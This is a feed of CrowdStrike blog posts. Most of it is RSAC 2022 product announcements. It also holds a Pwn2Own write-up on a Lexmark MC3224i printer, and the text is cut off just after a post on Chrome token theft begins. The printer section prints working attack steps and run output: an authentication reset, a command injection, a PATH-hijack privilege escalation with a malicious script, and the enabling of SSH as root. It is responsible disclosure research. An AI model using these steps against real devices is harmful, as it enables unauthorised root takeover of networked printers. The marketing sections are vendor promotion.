There are new articles available, click to refresh the page.
Before yesterdayCrowdStrike

RSAC 2022: Introducing CrowdStrike Asset Graph — the Path to Proactive Security Posture Management

6 June 2022 at 07:23

Driven by all the new technologies being adopted and the move to the cloud, the number and types of assets an organization has to manage increased nearly fourfold over the last 10 years. As a result, organizations are at risk to adversaries, who continually conduct reconnaissance to identify, target and exploit soft targets and vulnerabilities. The proliferation of assets also creates an untenable situation for IT to minimize service disruption as asset configurations are changed and patches are applied. Gaining visibility and being able to manage both known and unknown assets is critical to maintaining proper security hygiene and a proactive security posture, but remains an unsolved challenge for nearly every organization. 

The scale of the challenge is immense: hundreds of thousands of assets and devices, with hundreds of thousands of accounts logging into those workloads, with thousands of applications running. For true cloud-based solutions, this problem becomes exponentially harder with hundreds of millions of assets, hundreds of millions of users, running tens of thousands of applications.

One of the biggest obstacles today in operationalizing security posture management is the lack of understanding of the cascading impact of any configuration change. For too long, security posture management tools have focused on the security impact of proposed mitigations, but are unable to understand the operational impact such a mitigation may have on the organization. This creates a gap between security and IT teams, resulting in huge hurdles for implementing any change. 

Let’s take a simple example of mitigating a vulnerability in a deployed product. First, it is almost impossible for any organization to even keep track of published vulnerabilities and associated patches due to the pace at which vulnerabilities are being discovered. Second, even if an organization knows about a mitigation, they cannot deploy it fast enough before exploits are available in the wild. That is because of the aforementioned lack of insight into the ITOps impact of any patch. The result is an ever-increasing attack surface and IT and security teams that are often at loggerheads.

Gaining a single, unified, 360-degree view of assets, identities and configurations across all systems — including cloud, on-premises, mobile, IoT and more — and understanding how each of these assets interacts with each other, provides a bridge to IT and security operations. 

For security teams, this level of dynamic visibility empowers them to discover and catalog every asset and its interconnected relationship to better understand the configurations, vulnerabilities and exposures that an adversary might try to exploit. And IT operations can better manage, maintain and track assets across the organization to better minimize service disruption, ensure system uptime and support other critical IT projects. 

CrowdStrike has always focused on solving the hard problem first by developing innovative, scalable solutions, and we are now applying the same approach to this area of security posture management. That’s why I’m so excited to announce that CrowdStrike today unveiled the CrowdStrike Asset Graph, a new graph database underpinning the CrowdStrike Falcon® platform. 

CrowdStrike Asset Graph dynamically monitors and tracks the complex interactions among assets, providing a single holistic view of the risks those assets pose. Asset Graph provides graph visualizations of the relationships among all assets such as devices, users, accounts, applications, cloud workloads and operations technology (OT), along with the rich context necessary for proper security hygiene and proactive security posture management to reduce risk in their organizations — without impacting IT.

Asset Graph: Powering the Falcon Platform and the Future of IT SecOps

CrowdStrike has once again done the hard, architectural work up front to deliver superior protection, performance and value from the Falcon platform. 

Asset resolution — the merging of small pieces of information from various sources and systems into a single view of the asset — continues to be an unmet challenge in the industry. For instance, one system in an IT environment may register a device by IP address, while another system registers it by user name. This problem grows more complex depending on how and where the asset is used (internal networks, on cloud networks, etc.) and the number of data sources used to track inventory. According to ESG, nearly one-third (32%) of organizations utilize 10 or more data sources to track and inventory their assets for security purposes.

This makes it incredibly difficult for organizations to gain a unified view of their assets — and conversely, makes it difficult to ensure that disparate assets are not conflated with a different asset of a similar name from another system. The data exists to make these distinctions, but resolving assets across myriad systems has proved elusive, until now.

Figure 1. CrowdStrike Asset Graph shows every entity (device, IoT, identities, etc.) on a customer network and how they all interact. This insight helps organizations make better decisions — from security to IT performance, utilization, capacity, license management and more — to proactively protect and manage their IT environment. (Click to enlarge)

The CrowdStrike Falcon platform was purpose-built with a cloud-native architecture to harness vast amounts of high-fidelity security and enterprise data, and deliver solutions through a single, lightweight agent to keep customers ahead of today’s sophisticated adversaries.  

CrowdStrike’s groundbreaking graph technologies, beginning with the company’s renowned Threat Graph®, help form a powerful, seamless and distributed data fabric, interconnected into a single cloud — the CrowdStrike Security Cloud — that powers the Falcon platform and CrowdStrike’s industry-leading solutions. 

Using a combination of artificial intelligence (AI) and behavioral pattern-matching techniques to correlate and contextualize information in the vast data fabric, CrowdStrike’s graphs create a “collect data once, reuse it multiple times” approach to solving the biggest problems customers face. With the introduction of Asset Graph, CrowdStrike is applying this same approach to solving customers’ hardest, unmet challenges with an eye to proactive security, as well as unprecedented IT visibility and risk management.  

The three highly advanced graph technologies underpinning the Falcon platform now include:

  • Threat Graph: CrowdStrike’s industry-defining Threat Graph takes trillions of security data points from millions of sensors, enriched by threat intelligence data and third-party sources, to identify and link threat activity together to provide full visibility of attacks and automatically prevent threats in real time across CrowdStrike’s global customer base. 
  • Intel Graph: By analyzing and correlating massive amounts of data on adversaries, their victims and their tools, Intel Graph provides unrivaled insights into the shifts in tactics and techniques, powering CrowdStrike’s adversary-focused approach with world-class threat intelligence. 
  • Asset Graph: With this release, CrowdStrike is solving one of the most complex customer problems today: identifying assets, identities and configurations accurately across all systems including cloud, on-premises, mobile, IoT and more, and connecting them together in a graph form. Unifying and contextualizing this information will lead to powerful new solutions that transform how organizations enforce security hygiene and dynamically manage their security posture. 

Falcon Discover 2.0: The First Module Powered by Asset Graph

CrowdStrike Asset Graph will enable new Falcon modules and features built on top of it to define, monitor and explore the relationships among assets within an organization. The first Falcon module to use Asset Graph is Falcon Discover™, CrowdStrike’s security hygiene solution, which includes the following enhancements: 

  • Newly enhanced dashboards, highly customizable filters and sharing options: IT teams can tailor their experience of Asset Graph’s map visualization and powerful search capabilities, all presented conveniently within the Falcon Discover console. 
  • New third-party data integration with ServiceNow: By combining a ServiceNow integration with Asset Graph and Falcon Discover, IT teams gain another layer of asset visibility around devices in a single console, providing enhanced monitoring over unmanaged and unsupported assets.

Manage Risk by Thinking Like an Adversary

CrowdStrike has long advocated for an adversary-focused approach to security. This means staying ahead of shifting adversary tradecraft and tactics so you know how they’ll come after you. It also means having deep visibility across your critical assets and technology environment to understand where they’ll come after you as well. 

The introduction of Asset Graph will enable organizations to gain a much deeper understanding of their complete technology environment and how it interacts, more accurately assess the risk posture of their assets, and move to proactively adapt their security posture to defend against today’s adversaries without disrupting IT operations. 

Additional Resources

RSAC 2022: CrowdStrike Innovations that Prioritize Data

6 June 2022 at 07:42

It’s been several years since we’ve been at the RSA Conference in person and having face-to-face interaction is invaluable — the energy here is palpable. The theme for RSAC 2022 is “transform.” It’s a fitting theme given how much has changed in the cybersecurity world in the last few years. The move to support remote workers, the massive adoption of cloud workloads, and the proliferation of devices and assets connected to corporate networks have merged to create a massive attack surface that adversaries seek to exploit. These broad trends have also generated vast amounts of data that create unique opportunities for organizations to gain deeper observability and understanding of how their environments operate.   

At CrowdStrike, we embrace the concept of transformation and continue to build technology that transforms the way security is delivered and experienced by customers. We want to empower our customers to use data to make actionable decisions faster. In the current landscape, understanding data and quickly acting on it is the difference between being breached or not. 

This drive for innovation and transformation is demonstrated in two big announcements that CrowdStrike is making today at RSAC. The first includes new automation capabilities and deeper data integrations in Falcon XDR to supercharge threat detection, investigations, response and hunting. The second announcement is Humio for Falcon, a new capability that extends data retention of CrowdStrike Falcon® telemetry for one year or longer, enhancing threat analytics, threat hunting abilities and compliance requirements. 

Expanding Our Vision of CrowdXDR Alliance with New Partners

It’s important to note that third-party data ingestion is critical for driving outcomes in extended detection and response (XDR). The data ingestion process can be complex — varying by vendor platform and dependent on each customer’s environment configurations. This is why CrowdStrike continues to expand third-party support for the CrowdXDR Alliance, which is delivering a standardized schema for data sharing to enrich XDR detections. 

This morning, CrowdStrike announced several exciting developments that further solidify our position as a leader in XDR. The first is the expansion of our CrowdXDR Alliance to include key strategic partners, including:

  • Menlo Security: web and email security
  • Ping Identity: identity and access management
  • Vectra: network detection and response

Together, the CrowdXDR Alliance will extend the capabilities of Falcon XDR to accelerate triage and investigation for our customers, and automate responses across endpoint, cloud, identity management, network and web security. 

By extending visibility and control into identities, network, cloud, email and applications, customers will have the flexibility and extension options needed based on their security technology stack. These new partnerships will also empower security teams to identify and hunt for threats at an increased speed and scale, all while providing powerful and relevant insights using data sources that extend the power of endpoint detection and response (EDR) beyond endpoints.

Falcon XDR Automates Incident Response for Faster Detection and Remediation

Additionally, we have invested in our Falcon XDR tech for organizations seeking a native approach by adding new capabilities that speed up detections, including:

  • Falcon Fusion workflows based on XDR detections: Our customers can now automate incident response workflows with Falcon Fusion, CrowdStrike’s security orchestration, automation and response (SOAR) framework, which is fully integrated with Falcon XDR. Falcon Fusion now automates numerous workflows directly from a Falcon XDR detection, including:
    • Ticket creation through ServiceNow, a CrowdXDR Alliance partner. 
    • Notifications through email, Slack or webhook. 
    • Incident details from status changes to team assignments and comments. 
  • XDR detections event timeline: We’ve accelerated triage and investigation with a timeline view that displays key events of a detection in chronological order to easily understand how activity progressed. 
  • Graph visualization of custom XDR detections: Customers can create custom XDR detections from queries they’ve written to hunt for threats in their environment. Falcon XDR graph explorer visualizes how the events and entities in a custom XDR detection are related, enabling security analysts to rapidly orient and explore connections in cross-domain data.

Providing immediate customer value and helping to solve their biggest security problems is at the heart of everything we do at CrowdStrike. Our tech has always aligned with this vision down to its fundamental foundation. One of these problems, customers have told us, is a struggle to make sense of the sheer amount and complexity of log data and telemetry. 

The CrowdXDR Alliance is critical for this very reason: so we can empower customers to effectively and elegantly enrich the data that we have with other third parties, creating a detailed storyline on how an attack develops and progresses from detection to remediation. We have continued to invest in enriching endpoint data by adding visibility and telemetry from all workloads, regardless of where they are: on premises, in the cloud or deployed in a container.

As we know well by now, good XDR starts with good EDR, and CrowdStrike’s EDR is unparalleled in the market. Unlike other vendors that claim to “be XDR” without providing any framework for it nor any semblance of a robust EDR strategy, CrowdStrike’s strategy has been clear from the beginning: bring the right information into the Falcon platform at the right time to enrich our EDR telemetry. This allows us to make actionable decisions about real-world scenarios, which is incredibly impactful for security operations teams and CISOs who live and die by the data. 

Data Storage and Management at Scale: Humio for Falcon

We also announced a new capability today, Humio for Falcon, which enables security teams to have  an incredibly cost-effective way to store and manage data. Humio for Falcon will enable customers to have access to extended data retention for one year or longer with CrowdStrike Falcon’s enriched security telemetry. Security teams have been asking for contextual data to provide timely and valuable insights across their IT environments. Now, Humio for Falcon will not only help organizations fulfill compliance requirements but also inform threat analytics and threat hunting abilities.

With Humio for Falcon, customers now have a cost-effective and easy way to search for years’ worth of their EDR data, which is revolutionary in its own right. We’ve heard time and again from customers using competing products that they’re simply paying too much for this type of service and they need to be able to log more data, not less. This is ever-more timely in the wake of widespread issues, such as Log4Shell. 

In fact, in the wake of Log4Shell, customers around the world told us that of all the technologies they had in their environment, the de facto go-to technology was the Falcon platform in conjunction with our Humio technology. With this winning combination, customers were able to do a quick sweep of their cyber environment to look for Log4Shell issues and obtain a view of a year’s worth of data within seconds. We know these cyber issues affect an organization’s bottom line, so every second counts, and that’s the power of Humio for Falcon.

Humio for Falcon brings together the world’s most advanced security platform in CrowdStrike Falcon, with our Humio offering, which expands our XDR capabilities by ingesting and correlating data from any log, application or feed to deliver actionable insights and real-time protection. In other words, customers receive data ingestion that’s faster, more flexible and less costly than anything on the market, while they get deep, contextual and faster analytics on massive amounts of log data. With longer data retention, security teams can see potential threats faster than ever within their environments and conduct lightning-fast searches on log data. That speed enables threat hunting and troubleshooting at an unprecedented scale.

Customers can feed Falcon platform data directly into Humio with the Falcon Data Replicator (FDR). This data is instantly searchable and can be cross-referenced with other incumbent data sources in Humio. By analyzing multiple log sources as part of their security detections, customers can better define and narrow the scope of detections to match exact adversary techniques and behaviors, resulting in fewer false positives. Other benefits include:

  • Reduced cost with longer data retention: With Humio’s scalable storage and advanced compression techniques, customers can keep Falcon platform data in Humio for one year or longer. This wealth of historical data gives customers the confidence they need for complete and accurate investigations, which allows faster, focused and more cost-effective detection and remediation.
  • Fast and custom search: Humio’s feature-rich query language and index-free search times allow customers to ask any questions of their Falcon platform data and get immediate answers with new UI dashboards. Customers can create specific research that meets an exact business scenario and generate new insights from their Falcon platform data. 

CrowdStrike’s fundamental technology advantage is that we are relentlessly customer-obsessed. We want to solve the hard problems that are of the most importance to our customers and our tech stack delivers on the promise of stopping breaches. We have created a once-in-a-generation cloud platform for cybersecurity that solves a growing list of customer needs, all from a single agent, providing durable growth for many years to come. 

Join CrowdStrike at RSAC 

If you’re attending RSAC this year, we encourage you to stop by booth N-6155 for a conversation, live demos or to participate in our adversary training.

CrowdStrike will also be hosting a number of keynotes and presentations with a focus on the adversary and how they’re looking to exploit cloud technology and customer environments.  

Here are a few things to look forward to this week:

KEYNOTE: Hacking Exposed: Next-Generation Tactics, Techniques and Procedures

  • Date: Thursday, June 9, 9:40-10:30 a.m. PT 
  • I will be joined on stage by CrowdStrike CEO George Kurtz to demonstrate how adversaries seek to exploit cloud environments by breaking down cr8escape, a new vulnerability discovered by the CrowdStrike Cloud Threat Research team that could allow an attacker to escape from a Kubernetes container, gain root access to the host and be able to move anywhere in the cluster. 

SESSION: Confessions of a Sandbox: How AI Is Disrupting Automated Threat Analysis

  • Date: Tuesday, June 7, 1:15-2:05 p.m. PT
  • Join CrowdStrikers Marian Radu (Senior Director, Data Science) and Liviu Arsene (Director of Threat Research and Reporting) for a discussion on the role of artificial intelligence (AI) in automating threat analysis. 

SESSION: Extend EDR Visibility by Logging Everything: Demo with Free Integrations

  • Date: Thursday, June 9, 10:50-11:40 a.m. PT
  • Adam Hogan, CrowdStrike’s SE Director for Humio, will show why log management can be a powerful tool for investigating incidents. 

Additional Resources

RSAC 2022: CrowdStrike Delivers Protection that Powers Productivity

6 June 2022 at 07:45

The theme of RSA Conference 2022 succinctly captures the aftermath of the disruption we’ve all experienced over the last couple of years: Transform.  

Customers continue to transform and accelerate digital initiatives in response to the massive economic and technological shifts driven by the COVID-19 pandemic. The shift to the cloud, embrace of DevOps and broad adoption of software-as-a-service (SaaS) technologies have dramatically expanded the attack surface and made companies more vulnerable than ever. 

In response to these widespread changes, adversaries continue to transform as well, refining tactics and tradecraft to exploit vulnerabilities and misconfigurations across digital infrastructure. As a result, attacks have become more sophisticated, brazen and pernicious. The CrowdStrike 2022 Global Threat Report documented many of these adversarial shifts, including the targeting of cloud service providers to exploit trusted relationships, the broad weaponization of vulnerabilities and architectural limitations in legacy systems, and the growth of devastating big game hunting (BGH) ransomware attacks.

These trends have transformed our understanding of security as well. Security has moved into the spotlight and emerged as a top agenda item for boards of directors as the risk and impact of cyberattacks has become more consequential. Organizational leaders are increasingly seeking input from CISOs who understand business operations to help strengthen cyber resiliency plans and maintain business continuity. 

As I’ve noted many times, these massive shifts require a security technology transformation as well. The complexity of today’s IT environment and security stack requires a cloud-native security platform that breaks down silos and delivers the speed and scale required to stay ahead of adversaries and stop breaches. It requires a platform that can harness data from across the organization to protect your most critical assets and deliver an adversary-focused view of your organizational risk posture. Most of all, it requires a platform that you can trust to protect you on what could be your worst day.

Modern security should not only protect your organization, it should power your productivity as well. It needs to dynamically adapt security postures as environments change faster than adversaries can react and attack, without impacting IT. 

That’s why I’m excited to announce that this week at RSAC, CrowdStrike is unveiling major new innovations to the CrowdStrike Falcon® platform that meet the urgency of the moment and keep customers ahead of the adversary.

Introducing the CrowdStrike Asset Graph: Observability Across IT Assets and the Attack Surface 

When we introduced CrowdStrike Threat Graph®, we fundamentally changed how the security industry ingested, indexed and actioned massive amounts of security data to automatically prevent threats in real time. This is an architectural linchpin of our “collect data once, reuse it multiple times” approach to solving the biggest problems that customers face.  

With the introduction of CrowdStrike Asset Graph, we’re once again leading the industry forward by delivering observability data that provides a bridge to IT operations and security. CrowdStrike Asset Graph solves one of the most complex customer problems today: identifying and showing the interconnected relationship between the hundreds of millions of assets, identities and configurations accurately across all systems including cloud, on-premises, mobile, Internet of Things (IoT) and more, and connecting them together in a graph form. Ingesting this telemetry into the Falcon platform will provide organizations with critical productivity insight into asset performance, uptime and more, and empower security teams to understand how external activity like adversary attacks, patching and configuration changes alter the attack surface.

The combination of our groundbreaking graph technologies creates a powerful, seamless and distributed data fabric, interconnected into a single cloud — the CrowdStrike Security Cloud — that powers the Falcon platform and our industry-leading solutions. 

The addition of Asset Graph will enable new Falcon modules and features built on top of the platform. The first Falcon module to use Asset Graph is Falcon Discover™ Security Hygiene, providing customers with real-time visibility into the devices, users and applications on the network, and a deeper understanding of the relationships between these assets.

For more on Asset Graph, you can read this companion blog post by our CPO, Amol Kulkarni. 

Driving Innovations in Extended Detection and Response (XDR) 

At CrowdStrike, XDR is not just a rebranding opportunity or simply the integration of data into a single console. XDR is the natural evolution of endpoint detection and response (EDR) — it must start with EDR technology and build on that foundation. XDR needs to deliver the most relevant telemetry from systems and applications from across the entire IT security ecosystem to accelerate visibility, detection and response actions beyond the endpoint. It needs to power security teams to stop breaches — faster. 

That is why I’m excited to announce that CrowdStrike has expanded the ground breaking CrowdXDR Alliance to include key strategic partners across web and email security, identity and access management, and network detection and response. With the CrowdXDR Alliance, we’re creating a standardized schema for data sharing to enrich XDR detections with the most high-value telemetry data from leading security vendors. We also unveiled powerful new capabilities that deliver new levels of automation to speed threat detection and response efforts. 

Unveiling Humio for Falcon: Do More with Data 

Cybersecurity is fundamentally a data problem. To stay ahead of adversaries and uncover and detect potential threats, security teams need to be able to rapidly analyze and act on real-time and historical data in their environment. Organizations want to be able to log and action more data, but existing solutions prove cost prohibitive and fail to deliver the speed and scale required to meet the moment. 

Today, CrowdStrike is empowering customers to do more with their data with the introduction of Humio for Falcon, a new capability that extends data retention of CrowdStrike Falcon telemetry for one year or longer, enhancing threat analytics, threat hunting abilities and compliance requirements. The new capability gives security teams the ability to store security and IT telemetry from the Falcon platform, enriched and contextualized across endpoints, workloads and identities, to address the challenge of operationalizing massive volumes of data.

For more on the exciting innovations we’re unveiling for Falcon XDR and Humio for Falcon, you can read this companion blog post by our CTO, Michael Sentonas

Join CrowdStrike at RSAC 2022

After being remote for most events for the past two years, it’s incredibly exciting to be able to see customers, partners and the security community in person again. If you’re attending RSAC this year, we encourage you to stop by booth N-6155 for a conversation, live demos or to participate in our adversary training.

CrowdStrike will also be hosting a number of keynotes and presentations with a focus on the adversary and how they’re looking to exploit cloud technology and customer environments.  

Here are a few things to look forward to this week:

KEYNOTE: Hacking Exposed: Next-Generation Tactics, Techniques and Procedures

  • Date: Thursday, June 9, 9:40-10:30 a.m. PT 
  • CrowdStrike CTO Michael Sentonas will join me on stage to demonstrate how adversaries seek to exploit cloud environments by breaking down cr8escape, a new vulnerability discovered by the CrowdStrike Cloud Threat Research team that could allow an attacker to escape from a Kubernetes container, gain root access to the host and be able to move anywhere in the cluster. 

SESSION: Confessions of a Sandbox: How AI Is Disrupting Automated Threat Analysis

  • Date: Tuesday, June 7, 1:15-2:05 p.m. PT
  • Join CrowdStrikers Marian Radu (Senior Director, Data Science) and Liviu Arsene (Director of Threat Research and Reporting) for a discussion on the role of artificial intelligence (AI) in automating threat analysis. 

SESSION: Extend EDR Visibility by Logging Everything: Demo with Free Integrations

  • Date: Thursday, June 9, 10:50-11:40 a.m. PT
  • Adam Hogan, CrowdStrike’s SE Director for Humio, will show why log management can be a powerful tool for investigating incidents. 

Additional Resources

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product Lexmark MC3224
Affected Firmware Versions
(without claim for completeness)
CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware Version CXLBL.076.294 (CVE-2021-44735)

Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert

CVE CVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root Causes Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact Unauthenticated Remote Code Execution (RCE) as root
Researchers Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "[email protected]"
}

sd_journal_print "Start! params: '[email protected]'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

[email protected]:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', '[email protected]')
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

CrowdStrike Falcon Stops Modern Identity-Based Attacks in Chrome

  • A novel technique that reduces the overhead in extracting sensitive data from Chromium browser’s memory was recently found by researchers from CyberArk Labs 
  • Existing access to the targeted system is required before leveraging the technique
  • Successful use of the technique can lead to multifactor authentication (MFA) bypass by extracting valid authentication tokens from the web browser’s memory 
  • CrowdStrike has built defensive capability in the CrowdStrike Falcon® sensor against this technique
  • The Falcon platform helps identify, prevent and detect memory-based vulnerabilities and protect customers from modern identity-based attacks

Recent research from CyberArk Labs presents a new technique for extracting sensitive data from the Chromium browser’s memory. However, existing access to the targeted system is required before leveraging the technique to extract the sensitive data. The technique could enable identity-based attacks involving authentication bypass using Oauth cookies that have already passed an MFA challenge.

CrowdStrike built defensive capabilities to protect CrowdStrike customers from similar post-compromise attacks leveraging this novel technique for extracting valid authentication tokens from the Chromium browser’s memory. 

The Falcon sensor helps identify, prevent and detect memory-based vulnerabilities, while the Falcon platform enables customers to stay safe from identity-based attacks, enforcing Zero Trust on the endpoint, the identity and the data. 

According to the CrowdStrike Falcon OverWatch™ threat hunting team, 80% of breaches are now identity-driven. Stopping the adversary in real time and preventing attacks from progressing requires a unified approach to security that delivers native identity protection capabilities, halts adversaries and stops breaches.

About the Research and the Technique

